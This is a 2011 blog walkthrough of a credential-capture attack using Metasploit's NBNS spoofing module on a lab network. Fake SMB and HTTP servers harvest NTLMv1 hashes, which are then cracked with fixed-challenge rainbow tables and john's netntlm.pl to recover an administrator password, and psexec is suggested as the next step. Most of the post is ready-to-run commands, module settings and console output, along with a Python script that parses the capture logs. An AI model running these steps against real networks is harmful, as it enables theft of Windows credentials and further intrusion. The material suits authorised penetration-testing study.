Friday, April 15, 2011

Metasploit NBNS Auxiliary FTW

Metasploit's NBNS auxiliary module in action. I will be using Metasploit Express for the exercise. The objective is to gain access to the victim's password.


This video is based on Packetstan's awesome tutorial. Do check it out here for full details:
http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html


Let's begin...
First we start the Metasploit auxiliary NBNS module:
    auxiliary/spoof/nbns/nbns_response
        -> NBNS queries are sent out as broadcasts, so we can see every request on the segment and answer it with our own spoofed NBNS response to the victim. This poisons the name lookup.
msf auxiliary(nbns_response) > show options

Module options (auxiliary/spoof/nbns/nbns_response):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   REGEX    .*               yes       Regex applied to determene if spoofed reply is sent
   SPOOFIP  172.72.5.1       yes       IP address with which to poison responses
   VERBOSE  true             no        Determines whether to display responses

msf auxiliary(nbns_response) > run
[*] Auxiliary module execution completed

[*] NBNS Spoofer started. Listening for NBNS requests...
msf auxiliary(nbns_response) > 

As soon as an end-client sends out a name resolution query, our NBNS response server answers it, claiming to be the host the client is looking for.
[*] Packet Recieved from 172.72.5.139
[*] Regex matched PLAYGROUND1 from 172.72.5.139. Sending reply...
Now that we control the name resolution, we can start rogue / fake services at our end, such as a file server [ smb ] and a web server [ http ].



The idea is to set up these fake services, and capture the hashes when the victim attempts to access them.


Configure and start the following modules:
auxiliary/server/capture/smb
msf auxiliary(smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in JOHN format
   LOGFILE     /tmp/smblog       no        The local filename to store the captured hashes
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     445               yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > show options
Module options (auxiliary/server/capture/http_ntlm):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CHALLENGE   1122334455667788  yes       The 8 byte challenge
   LOGFILE     /tmp/httplog      no        The local filename to store the captured hashes
   PWFILE                        no        The local filename to store the hashes in Cain&Abel format
   SRVHOST     172.72.5.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80                yes       The local port to listen on.
   SSL         false             no        Negotiate SSL for incoming connections
   SSLVersion  SSL3              no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                 no        The URI to use for this exploit (default is random)

When the user attempts to authenticate to / access the SMB / HTTP services, our rogue server responds and the end-client sends its hashed credentials to get authenticated.
msf auxiliary(smb) > [*] 2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a


msf auxiliary(http_ntlm) > [*] Packet Recieved from 172.72.5.139
[*] Regex matched SERVER from 172.72.5.139. Sending reply...
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058
[*] Request '/' from 172.72.5.139:1058

[*] 172.72.5.139: PLAYGROUND1\Administrator 76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a on PLAYGROUND1
We configured the log file locations in the module options, so these hashes are also written to their respective log files.
root@victor:Tools# cat /tmp/smblog
2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a

root@victor:Tools# cat /tmp/httplog
2011-04-19 16:17:49 +0530:172.72.5.139:PLAYGROUND1:PLAYGROUND1:Administrator:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a
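On the receiving end of an engagement (or when the same capture modules are run as a honeypot), the two log formats above are what you have to work from to decide which clients fell for the spoof and which accounts need their passwords rotated. The parser below is an added example written for this page, not code from Metasploit or the Packetstan tutorial; the sample inputs are copied from the smblog and httplog output shown above, and the record and function names are my own. The httplog line is the awkward one: its timestamp contains colons, so it has to be split from the right, six fields deep.

```python
import re
from dataclasses import dataclass

# Samples copied from the capture logs shown above so the parser runs offline.
SAMPLE_SMBLOG = """2011-04-19 16:20:17 +0530
NTLMv1 Response Captured from 172.72.5.139:1063
PLAYGROUND1\\Administrator OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
LMHASH:76365e2d142b56125b01a43c055c22ccd736fb4bab100a50
NTHASH:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a
"""

SAMPLE_HTTPLOG = (
    "2011-04-19 16:17:49 +0530:172.72.5.139:PLAYGROUND1:PLAYGROUND1:Administrator:"
    "76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:"
    "046e38a3f14de43e947446e86925eb365a4cfa09599aa04a\n"
)


@dataclass
class CapturedAuth:
    timestamp: str
    source_ip: str
    domain: str
    user: str
    lm_response: str
    nt_response: str
    channel: str  # "smb" or "http"


_TS = re.compile(r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d [+-]\d{4}$")
_CAPTURED = re.compile(r"^(NTLMv\d) Response Captured from ([\d.]+):(\d+)$")
_IDENT = re.compile(r"^([^\\\s]+)\\(\S+)\s")  # DOMAIN\user OS:...


def parse_smblog(text: str):
    """Parse the multi-line smblog format: a timestamp line, a 'Captured from'
    banner, the DOMAIN\\user line, then LMHASH: and NTHASH: lines."""
    records, ts, cur = [], None, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if _TS.match(line):
            ts = line
        elif (m := _CAPTURED.match(line)):
            cur = {"timestamp": ts, "source_ip": m.group(2), "channel": "smb"}
        elif cur is not None and (m := _IDENT.match(line)):
            cur["domain"], cur["user"] = m.group(1), m.group(2)
        elif cur is not None and line.startswith("LMHASH:"):
            cur["lm_response"] = line[len("LMHASH:"):]
        elif cur is not None and line.startswith("NTHASH:"):
            cur["nt_response"] = line[len("NTHASH:"):]
            records.append(CapturedAuth(**cur))
            cur = None  # NTHASH closes the record
    return records


def parse_httplog(text: str):
    """Parse the one-line httplog format. The timestamp holds ':' characters, so
    split from the right: ip, two name columns, user, LM response, NT response."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.rsplit(":", 6)
        if len(parts) != 7:
            continue  # not a capture line
        ts, ip, domain, _second_name_col, user, lm, nt = parts
        records.append(CapturedAuth(ts, ip, domain, user, lm, nt, "http"))
    return records


def accounts_to_reset(records):
    """Distinct DOMAIN\\user pairs seen in any capture, lower-cased and sorted."""
    return sorted({f"{r.domain}\\{r.user}".lower() for r in records})


def leaking_clients(records):
    """Distinct client IPs that handed over a challenge-response."""
    return sorted({r.source_ip for r in records})


if __name__ == "__main__":
    found = parse_smblog(SAMPLE_SMBLOG) + parse_httplog(SAMPLE_HTTPLOG)
    print("accounts to reset:", accounts_to_reset(found))
    print("clients that leaked:", leaking_clients(found))
```

Because the CHALLENGE option is the same fixed value for both modules, the LM and NT responses recorded over SMB and over HTTP are byte-for-byte identical, which the sample data shows and which is exactly what makes the precomputed tables in the next section possible.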


But these hashes are not plain password hashes: they are responses computed against a challenge, so they cannot simply be looked up. Because the modules use a fixed challenge (1122334455667788), though, we can use Rainbow tables precomputed for exactly that challenge.


Download the free Rainbow tables here:
ftp://freerainbowtables.mirror.garr.it/mirrors/freerainbowtables/halflmchall/


Using rcracki [ http://sourceforge.net/projects/rcracki/ ] and the rainbow tables, we now crack the first half of the LM hash. We only need the first 16 characters of the LM hash, used with rcracki_mt as follows:
./rcracki_mt -h <first 16 chars of LM hash> /path/to/rainbowtables/
[ First 16 chars of LM hash in this instance -> 76365e2d142b5612 ]


So the command I run is:
./rcracki_mt -h 76365e2d142b5612 /halflmchall_all-space#1-7_0/
First portion cracked
### output snipped ### 
statistics
-------------------------------------------------------
plaintext found:            1 of 1 (100.00%)
total disk access time:     23.17 s
total cryptanalysis time:   16.95 s
total pre-calculation time: 260.47 s
total chain walk step:      199970001
total false alarm:          1669
total chain walk step due to false alarm: 12603773
result
-------------------------------------------------------
76365e2d142b5612    PASSWOR    hex:50415353574f52
### output snipped ### 
Aha... we have got the first portion of the password [ PASSWOR ]. Now we feed this portion of the password as a seed to netntlm.pl [ found in the john install directory ]. The input file should contain the hashes in john-compatible format [ from smblog ] or in the following format built from httplog:
<user>:::<LMHASH>:<NTLMHASH>:<Metasploit_static_CHALLENGE>
i.e. in the format as follows ->
root@victor:Tools# cat /tmp/nbns
playground\administrator:::76365e2d142b56125b01a43c055c22ccd736fb4bab100a50:046e38a3f14de43e947446e86925eb365a4cfa09599aa04a:1122334455667788

netntlm.pl is run as follows:
./netntlm.pl --seed <first_portion> --file nbns
root@victor:run#./netntlm.pl --seed PASSWOR --file /tmp/nbns
So we have the uppercase password -> PASSWORK


Now we have the full password. But as we can see, it is all uppercase. We need to run it through the previous command once more, this time with the full uppercase password as the seed, i.e.
root@victor:run#./netntlm.pl --seed PASSWORK --file /tmp/nbns
and we will get the password in its true case.
Performing NTLM case-sensitive crack for account: playground\administrator.
guesses: 1  time: 0:00:00:00 100.00% (ETA: Tue Apr 12 17:19:56 2011)  c/s: 1163  trying: passwork
Loaded 1 password hash (NTLMv1 C/R MD4 DES [netntlm])
passwork         (playground\administrator)

We found the true case password -> "passwork" :)
We have the password and can now use it in further attacks such as psexec!

Metasploit's auxiliary NetBIOS name spoofer module is very convenient and effective in a pen test. Start the module, then set up fake services like smb / http, and then just sit back and watch the hashes pop up...!



Thank You for watching!
